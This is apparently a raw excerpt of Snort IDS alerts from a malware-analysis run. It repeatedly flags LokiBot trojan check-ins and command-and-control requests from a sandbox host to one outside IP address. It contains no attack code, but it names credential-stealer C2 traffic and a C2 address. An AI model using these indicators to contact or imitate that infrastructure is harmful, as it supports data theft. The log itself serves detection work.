                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49749 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49749 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49749 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49750 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49750 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49750 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49750 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49750 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49751 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49751 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49751 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49751 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49751 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49752 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49752 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49752 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49752 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49752 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49753 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49753 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49753 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49753 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49753 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49755 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49755 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49755 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49755 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49755 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49756 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49756 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49756 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49756 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49756 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49757 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49757 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49757 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49758 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49759 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49760 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49761 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49762 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49763 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49764 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49765 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49766 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49767 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49768 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49769 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49770 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49771 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49772 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49773 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49774 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49775 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49776 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49777 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49777 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49777 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49777 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49777 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49778 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49780 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49780 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49780 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49781 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49782 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49784 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49785 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49786 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49787 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49788 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49789 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49790 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49790 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49790 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49790 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49790 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49791 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49792 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49792 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49792 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49792 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49792 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49793 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49794 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 172.67.148.126:80
